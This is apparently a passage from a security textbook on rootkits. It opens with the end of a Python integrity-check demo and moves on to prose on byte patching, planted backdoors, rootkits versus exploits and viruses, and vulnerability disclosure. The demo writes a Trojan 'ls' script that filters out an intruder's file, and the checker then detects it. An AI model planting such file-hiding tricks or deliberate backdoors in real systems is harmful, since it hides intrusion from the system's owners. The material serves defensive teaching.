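        # The intruder's changes: a Trojan ls and the data it is meant to hide.
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b'#!/bin/sh\n/bin/ls "$@" | grep -v hacker_stuff\n')
        with open(os.path.join(root, "hacker_stuff"), "wb") as f:
            f.write(b"stolen data\n")
        return compare(before, baseline(root))


if __name__ == "__main__":
    print(demo_trojaned_ls())
```

Run stand-alone it prints {'modified': ['bin/ls'], 'added': ['hacker_stuff'], 'removed': []}: the Trojan is unmasked because its bytes changed, no matter what it reports about itself when executed. For a real deployment, generate the baseline with baseline("/usr/bin") right after installation, save_db() it to removable media, and run compare() from a rescue boot rather than from the possibly infected kernel.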

How Do Rootkits Work?

Rootkits work using a simple concept called modification. In general, software is designed to make specific decisions based on very specific data. A rootkit locates and modifies the software so it makes incorrect decisions.

There are many places where modifications can be made in software. Some of them are discussed in the following paragraphs.

Patching

Executable code (sometimes called a binary) consists of a series of statements encoded as data bytes. These bytes come in a very specific order, and each means something to the computer. Software logic can be modified if these bytes are modified. This technique is sometimes called patching—like placing a patch of a different color on a quilt. Software is not smart; it does only and exactly what it is told to do and nothing else. That is why modification works so well. In fact, under the hood, it’s not all that complicated. Byte patching is one of the major techniques used by “crackers” to remove software protections. Other types of byte patches have been used to cheat on video games (for example, to give unlimited gold, health, or other advantages).

Easter Eggs

Software logic modifications may be “built in.” A programmer may place a back door in a program she wrote. This back door is not in the documented design, so the software has a hidden feature. This is sometimes called an Easter Egg, and can be used like a signature: The programmer leaves something behind to show that she wrote the program. Earlier versions of the widely used program Microsoft Excel contained an Easter Egg that allowed a user who found it to play a 3D first-person shooter game similar to Doom [13] embedded inside a spreadsheet cell.

Spyware Modifications

Sometimes a program will modify another program to infect it with “spyware.” Some types of spyware track which Web sites are visited by users of the infected computer. Like rootkits, spyware may be difficult to detect. Some types of spyware hook into Web browsers or program shells, making them difficult to remove. They then make the user’s life hell by placing links for new mortgages and Viagra on their desktops, and generally reminding them that their browsers are totally insecure. [14]

Source-Code Modification

Sometimes software is modified at the source—literally. A programmer can insert malicious lines of source code into a program she authors. This threat has caused some military applications to avoid open-source packages such as Linux. These open-source projects allow almost anyone (“anyone” being “someone you don’t know”) to add code to the sources. Granted, there is some amount of peer review on important code like BIND, Apache, and Sendmail. But, on the other hand, does anyone really go through the code line by line? (If they do, they don’t seem to do it very well when trying to find security holes!) Imagine a back door that is implemented as a bug in the software. For example, a malicious programmer may expose a program to a buffer overflow on purpose. This type of back door can be placed on purpose. Since it’s disguised as a bug, it becomes difficult to detect. Furthermore, it offers plausible deniability on the part of the programmer!

Okay, we can hear you saying “Bah! I fully trust all those unknown people out there who authored my software because they are obviously only three degrees of separation from Linus Torvalds [15] and I’d trust Linus with my life!” Fine, but do you trust the skills of the system administrators who run the source-control servers and the source-code distribution sites? There are several examples of attackers gaining access to source code. A major example of this type of compromise took place when the root FTP servers for the GNU Project (gnu.org), source of the Linux-based GNU operating system, were compromised in 2003. [16] Modifications to source code can end up in hundreds of program distributions and are extremely difficult to locate. Even the sources of the very tools used by security professionals have been hacked in this way. [17]

The Legality of Software Modification

Some forms of software modification are illegal. For example, if you use a program to modify another program in a way that removes copyright mechanisms, you may be in violation of the law (depending on your jurisdiction). This applies to any “cracking” software that can commonly be found on the Internet. For example, you can download an evaluation copy of a program that “times out” and stops functioning after 15 days, then download and apply a “crack,” after which the software will run as if it had been registered. Such a direct modification of the code and logic of a program would be illegal.

What a Rootkit Is Not

Okay, so we’ve described in detail what a rootkit is and touched on the underlying technology that makes a rootkit possible. We have described how a rootkit is a powerful hacker tool. But, there are many kinds of hacker tools—a rootkit is only one part of a larger collection. Now it’s time to explain what a rootkit is not.

A Rootkit Is Not an Exploit

Rootkits may be used in conjunction with an exploit, but the rootkit itself is a fairly straightforward set of utility programs. These programs may use undocumented functions and methods, but they typically do not depend on software bugs (such as buffer overflows).

A rootkit will typically be deployed after a successful software exploit. Many hackers have a treasure chest of exploits available, but they may have only one or two rootkit programs. Regardless of which exploit an attacker uses, once she is on the system, she deploys the appropriate rootkit.

Although a rootkit is not an exploit, it may incorporate a software exploit. A rootkit usually requires access to the kernel and contains one or more programs that start when the system is booted. There are only a limited number of ways to get code into the kernel (for example, as a device driver). Many of these methods can be detected forensically.

One novel way to install a rootkit is to use a software exploit. Many software exploits allow arbitrary code or third-party programs to be installed. Imagine that there is a buffer overflow in the kernel (there are documented bugs of this nature) that allows arbitrary code to be executed. Kernel-buffer overflows can exist in almost any device driver (for example, a printer driver). Upon system startup, a loader program can use the buffer overflow to load a rootkit. The loader program does not employ any documented methods for loading or registering a device driver or otherwise installing a rootkit. Instead, the loader exploits the buffer overflow to install the kernel-mode parts of a rootkit.

The buffer-overflow exploit is a mechanism for loading code into the kernel. Although most people think of this as a bug, a rootkit developer may treat it as an undocumented feature for loading code into the kernel. Because it is not documented, this “path to the kernel” is not likely to be included as part of a forensic investigation. Even more importantly, it won’t be protected by a host-based firewall program. Only someone skilled in advanced reverse engineering would be likely to discover it.

A Rootkit Is Not a Virus

A virus program is a self-propagating automaton. In contrast, a rootkit does not make copies of itself, and it does not have a mind of its own. A rootkit is under the full control of a human attacker, while a virus is not.

In most cases, it would be dangerous and foolish for an attacker to use a virus when she requires stealth and subversion. Beyond the fact that creating and distributing virus programs may be illegal, most virus and worm programs are noisy and out of control. A rootkit enables an attacker to stay in complete control. In the case of a sanctioned penetration (for example, by law enforcement), the attacker needs to ensure that only certain targets are penetrated, or else she may violate a law or exceed the scope of the operation. This kind of operation requires very strict controls, and using a virus would simply be out of the question.

It is possible to design a virus or worm program that spreads via software exploits that are not detected by intrusion-detection systems (for instance, zero-day exploits [18]). Such a worm could spread very slowly and be very difficult to detect. It may have been tested in a well-stocked lab environment with a model of the target environment. It may include an “area-of-effect” restriction to keep it from spreading outside of a controlled boundary. And, finally, it may have a “land-mine timer” that causes it to be disabled after a certain amount of time—ensuring that it doesn’t cause problems after the mission is over. We’ll discuss intrusion-detection systems later in this chapter.

The Virus Problem

Even though a rootkit is not a virus, the techniques used by a rootkit can easily be employed by a virus. When a rootkit is combined with a virus, a very dangerous technology is born.

The world has seen what viruses can do. Some virus programs have spread through millions of computers in only a few hours.

The most common operating system, Microsoft Windows, has historically been plagued with software bugs that allow viruses to infect computers over the Internet. Most malicious hackers will not reveal software bugs to the vendor. In other words, if a malicious hacker were to find an exploitable bug in Microsoft Windows, she would not reveal this to Microsoft. An exploitable bug that affects the default installation of most Windows computers is like a “key to the kingdom”; telling the vendor about it would be giving away the key.

Understanding rootkit technology is very important for defending against viruses. Virus programmers have been using rootkit technology for many years to “heat up” their viruses. This is a dangerous trend. Algorithms have been published for virus propagation [19] that can penetrate hundreds of thousands of machines in an hour. Techniques exist for destroying computer systems and hardware. And, remotely exploitable holes in Microsoft Windows are not going away. Viruses that use rootkit technology are going to be harder to detect and prevent.

Rootkits and Software Exploits

Software exploitation is an important subject relating to rootkits. (How software can break and be exploited is not covered in this book. If you’re interested in software exploitation, we recommend the book Exploiting Software. [20])

Although a rootkit is not an exploit, it may be employed as part of an exploit tool (for example, in a virus or spyware).

The threat of rootkits is made strong by the fact that software exploits are in great supply. For example, a reasonable conjecture is that at any given time, there are more than a hundred known working exploitable holes in the latest version of Microsoft Windows. [21] For the most part, these exploitable holes are known by Microsoft and are being slowly managed through a quality-assurance and bug-tracking system. [22] Eventually, these bugs are fixed and silently patched. [23]

Some exploitable software bugs are found by independent researchers and never reported to the software vendor. They are deadly because nobody knows about them except the attacker. This means there is little to no defense against them (no patch is available).

Many exploits that have been publicly known for more than a year are still being widely exploited today. Even if there is a patch available, most system administrators don’t apply the patches in a timely fashion. This is especially dangerous since even if no exploit program exists when a security flaw is discovered, an exploit program is typically published within a few days after release of a public advisory or a software patch.

Although Microsoft takes software bugs seriously, integrating changes by any large operating system vendor can take an inordinate amount of time.

When a researcher reports a new bug to Microsoft, she is usually asked not to release public information about the exploit until a patch can be released. Bug fixing is expensive and takes a great deal of time. Some bugs aren’t fixed until several months after they are reported.

One could argue that keeping bugs secret encourages Microsoft to take too long to release security fixes. As long as the public doesn’t know about a bug, there is little incentive to quickly release a patch. To address this tendency, the security company eEye has devised a clever method to make public the fact that a serious vulnerability has been found, but without releasing the details.

Figure 1-2, which comes from eEye’s Web site, [24] shows a typical advisory. It details when the bug was reported to a vendor, and by how many days the vendor patch is “overdue,” based on the judgment that a timely response would be release of a patch within 60 days. As we have seen in the real world, large software vendors take longer than 60 days. Historically, it seems the only time a patch is released within days is when a real Internet worm is released that uses the exploit.

Figure 1-2 Method used by eEye to “pre-release” a security advisory.